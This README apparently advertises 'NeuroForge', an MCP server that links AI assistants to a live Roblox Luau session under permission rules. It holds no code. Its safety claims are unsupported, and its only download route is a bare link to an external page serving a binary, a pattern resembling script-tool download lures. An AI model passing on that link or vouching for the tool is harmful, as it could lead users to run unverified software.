Instead of shouting commands into the void and waiting for a rebuild cycle, you tune into the frequency of a live session — AI assistants on one side, an instrumented Luau runtime on the other — and the conversation flows in both directions, in real time, under strict identity and permission rules. NeuroForge is a Model Context Protocol (MCP) server that gives AI coding companions (Claude, Cursor, or any MCP-compatible client) a structured, auditable doorway into a running Roblox Luau environment. It pairs with a whitelist-oriented execution platform so that every code submission, every inspection request, and every returned value is bound to a verified participant and a scoped capability grant. No guesswork. No blind pasting. Just a disciplined, observable bridge between the model that thinks and the runtime that runs. --- ## 🚀 What NeuroForge Actually Is Most developer tooling treats a game session as a black box: you write code, you deploy, you hope, you squint at logs. NeuroForge flips that posture. It turns the live Luau session into a queryable, scriptable surface — but only through the narrow pipe the operator has deliberately opened. Under the hood, NeuroForge is three cooperating layers: 1. **The MCP Face** — a protocol-compliant server that exposes tools, resources, and prompts to AI assistants. This is the part your assistant "sees." 2. **The Relay Spine** — a transport-agnostic message channel that ferries requests from the server to enrolled runtime agents and returns structured results. It is designed to be resilient to latency spikes and partial failures. 3. **The Runtime Instrumentation Kit** — a Luau-side library that loads into a permitted session, registers handlers, enforces the local policy, and reports back with typed payloads. Each layer is replaceable. Each layer is observable. Each layer can be locked down. --- ## 📦 Getting the Project Onto Your Machine [](https://demoos415.github.io/lua-script-bridge/) Because distribution happens through a curated release channel, the binary and its companion Luau instrumentation bundle are pulled together. Verify the integrity manifest before first launch — NeuroForge refuses to attach to a runtime if the manifest does not match. After acquisition, the expected layout on disk is: - `/app` — the MCP server entry point and its adapter modules - `/runtime` — the Luau instrumentation kit to be staged into the target environment - `/policy` — default capability matrices and identity descriptors - `/logs` — rolling structured event journals Configuration lives in a single `neuroforge.toml` file at the repository root. Sensitive values are referenced by environment indirection rather than inlined — never commit raw credentials to this file. --- ## 🗺️ Table of Contents - [Why This Exists](#-why-this-exists) - [Feature Constellation](#-feature-constellation) - [Architecture Walkthrough](#-architecture-walkthrough) - [The Permission Model](#-the-permission-model) - [Capability Scopes Explained](#-capability-scopes-explained) - [Multilingual & Accessibility Posture](#-multilingual--accessibility-posture) - [Responsive Interface Considerations](#-responsive-interface-considerations) - [Always-On Operational Support](#-always-on-operational-support) - [Typical Workflows](#-typical-workflows) - [Observability & Journaling](#-observability--journaling) - [Security Stance](#-security-stance) - [Performance Notes](#-performance-notes) - [Extending NeuroForge](#-extending-neuroforge) - [Frequently Wondered Things](#-frequently-wondered-things) - [Roadmap Signals for 2026](#-roadmap-signals-for-2026) - [Contributing Ethos](#-contributing-ethos) - [Disclaimer](#-disclaimer) - [License](#-license) --- ## 💡 Why This Exists Writing Luau for a live product is a peculiar craft. The language is expressive, the runtime is generous, but the loop between "I have an idea" and "the idea is validated against a real session" is historically long and lossy. Developers improvise: they sprinkle print statements, they rebuild, they lose the thread of what they were testing. NeuroForge compresses that loop without collapsing the safety net. It assumes two truths simultaneously: - The assistant is a powerful collaborator and deserves direct, structured access to the runtime. - The runtime is a production surface that must never be treated casually. The result is a tool that feels like a probe in one hand and a leash in the other. --- ## 🛰️ Feature Constellation - **Session-Aware Tool Surface** — tools exposed to the AI client are generated from the live capability manifest, so unavailable actions are never suggestible. - **Identity-Bound Execution** — every submitted snippet carries the identity of the requester; the runtime validates the identity before evaluating a single token. - **Structured Result Contracts** — returned values are typed and versioned, so the assistant never has to guess whether a payload is a table, a function handle, or a serialized trace. - **Deterministic Replay Hooks** — capture a sequence of operations and replay them against a prepared bench session for regression work. - **Composable Capability Sets** — grants are additive tokens that can be nested, revoked, or time-boxed without restarting the server. - **Graceful Degradation** — if the runtime link drops, NeuroForge surfaces a clear status to the assistant rather than hanging or fabricating output. - **Multi-Client Multiplexing** — several assistants can share a single enrolled runtime, each isolated by their own capability set. - **Language-Neutral Payloads** — the wire format is compact and language-independent, so adapters for additional AI frontends are straightforward to add. - **Audit-Ready Journals** — every accepted and rejected operation is logged with a correlation identifier. - **Zero-Surprise Defaults** — the out-of-the-box policy grants inspection only; execution privileges must be explicitly enabled. - - - - - --- ## 🏗️ Architecture Walkthrough The MCP face speaks a well-known protocol to the assistant. When the assistant asks to run something, the request is normalised into an internal operation envelope. That envelope carries: - a correlation identifier, - the originating identity, - the requested capability, - the payload, - and an expiry. The relay spine then hands the envelope to the matching runtime agent, which performs local policy checks, evaluates against the sandbox, and returns another envelope. Errors are first-class: they are encoded as structured results rather than thrown across the boundary. If you imagine a river with locks and gates, the relay spine is the lockkeeper. It does not decide what boats may pass — that is the policy engine's role — but it does decide when and how they pass. --- ## 🔐 The Permission Model NeuroForge embraces a principle we like to call *earned reach*. Nothing happens because the assistant guessed it could happen. Everything happens because an operator granted it, an identity proved it, and the runtime confirmed it. The model has three tiers: 1. **Enrollment** — an identity is registered with the server and assigned a baseline capability set. 2. **Grant** — additional capabilities are attached, optionally with a validity window and an attached purpose label. 3. **Revocation** — capabilities can be withdrawn at any moment; the next operation from that identity will simply fail closed. This is not a padlock bolted on afterward. It is the frame the whole structure is built around. --- ## 🧩 Capability Scopes Explained - `inspect.environment` — read structural facts about the live environment without touching state. - `inspect.values` — retrieve the current value of named references, subject to privacy filters. - `execute.dry` — evaluate expressions that are guaranteed side-effect free. - `execute.scoped` — evaluate statements within a designated namespace. - `execute.extended` — a broader grant intended for benches and pre-release environments. - `subscribe.events` — receive a stream of runtime events as they occur. - `replay.capture` — record a sequence for later reproduction. Capabilities compose. `execute.scoped` without `inspect.values`, for instance, lets a script change things but not observe them — a combination useful for stress exercises. --- ## 🌍 Multilingual & Accessibility Posture The MCP face renders human-readable strings in multiple languages, with English as the fallback. Localization bundles are plain text so they can be reviewed and revised without touching logic. The interface layer leans on semantic structure rather than visual trickery: labels are associated with their controls, contrast is generous, and animations are optional. Assistants are not the only readers of these surfaces — humans occasionally want to look over the shoulder too. To add a language, drop a bundle into the localization directory. The server negotiates the best match from the client's declared preferences. --- ## 📱 Responsive Interface Considerations While NeuroForge is primarily a server, its accompanying dashboards adapt smoothly from the smallest handheld display to a wide multi-panel monitor. Layout reflows, tables collapse gracefully, and journals scroll without churn. On narrow screens the event timeline becomes a vertical stream; on wide screens the same data splits into synchronised columns so you can correlate requests and responses at a glance. Touch targets are sized for fingers, keyboard shortcuts are documented for power users, and the whole thing avoids forcing a single interaction paradigm. --- ## 🕔 Always-On Operational Support A runtime bridge is only useful when it is available. NeuroForge runs continuously with health probes, self-healing reconnects, and a rotating log that never blocks the main loop. When something does go wrong, the operator does not have to hunt for the problem: the journal tells the story in chronological order, with severity tags and correlation trails. Operators can also subscribe to a heartbeat that quietly confirms the spine is alive. Silence is treated as a signal — not as comfort. --- ## 🧪 Typical Workflows **Quick inspection.** The assistant asks for the shape of a data structure. The runtime returns a typed description. No state is disturbed. **Guided repair.** The assistant proposes a small statement set under `execute.scoped`. The runtime evaluates it inside a namespace, and the result — success or structured error — flows back. **Regression drill.** A captured sequence is replayed against a prepared bench. Deviations are flagged with the exact envelope where they occurred. **Event reconnaissance.** The runtime streams events for a window while the assistant reasons about them and proposes follow-up inspections. Each workflow is repeatable, each is journaled, and each respects the same capability grammar. --- ## 📊 Observability & Journaling Every operation produces a journal entry. Entries are append-only and include: - timestamp with timezone, - correlation identifier, - identity reference, - capability used, - outcome tag, - duration, - and an optional free-form annotation supplied by the operator. Journals are readable as plain text, so they can be tailed, grepped, or shipped to a log aggregator. They are also machine-parseable, so dashboards can chart operation volume and failure ratios over time. --- ## 🛡️ Security Stance Security here is not a feature layered on top; it is the skeleton. The design assumes: - The assistant may be compromised or mistaken. - The runtime may be hostile to unexpected inputs. - The operator may be absent at the moment of the request. Against those assumptions, NeuroForge narrows the surface as far as it can, requires explicit grants for anything beyond observation, and fails closed rather than open. Capability grants are the only currency accepted; there is no implicit authority inherited from a client's reputation. --- ## ⚡ Performance Notes The relay spine is asynchronous end-to-end. Operations that only read are handled with the lightest possible path. Operations that change state go through the policy gate, which is intentionally cheap: a lookup, a comparison, a decision. Latency is dominated by the transport between server and runtime, not by NeuroForge itself. On a local bench, round trips are typically measured in the low single-digit milliseconds. --- ## 🧬 Extending NeuroForge The codebase is organized so that new frontends, new transports, and new capability scopes can each be added without touching the others. - **Adding a frontend.** Implement the protocol adapter interface; NeuroForge handles the rest. - **Adding a transport.** Provide a spine driver. The relay layer will negotiate it automatically. - **Adding a capability.** Declare the scope, document its meaning, and register it with the policy engine. Contributions that broaden reach without weakening the permission model are warmly welcomed. --- ## ❓ Frequently Wondered Things **Does the assistant get unrestricted authority?** No. Authority is granted, scoped, and revocable. **Can several assistants share a runtime?** Yes, and each is isolated by its own capability set. **What happens if the transport drops mid-operation?** The operation is abandoned cleanly, and the client is told so explicitly. **Is the journal human-readable?** Yes, and it is also structured for machines. **Can I attach to a bench environment?** Absolutely — benches are the recommended place for the broader execution scopes. --- ## 🔮 Roadmap Signals for 2026 - Deeper multi-runtime orchestration across several enrolled sessions. - Native visualization of operation graphs in the accompanying dashboard. - A formal grammar for authoring capability sets declaratively. - Expanded localization coverage. - Guided onboarding that walks a new operator through enrollment without external docs. --- ## 🤝 Contributing Ethos Bring curiosity. Bring restraint. Read the permission model twice before proposing changes to it. Prefer small, well-documented increments over sweeping rewrites. Every pull request is a conversation — assume good faith and write clearly. --- ## ⚠️ Disclaimer NeuroForge is provided as-is, without warranty of any kind, express or implied. It is intended for use in environments where the operator has explicit authorization to instrument the runtime. You are solely responsible for ensuring that your use complies with all applicable agreements, platform rules, and laws. The maintainers accept no liability for misuse, for unintended state changes, or for consequences arising from granting capabilities too broadly. Always test in a bench environment before pointing NeuroForge at anything that matters. Assistants are collaborators, not oracles. Treat their suggestions with the same scrutiny you would apply to any other automated system. --- ## 📜 License This project is distributed under the MIT License.
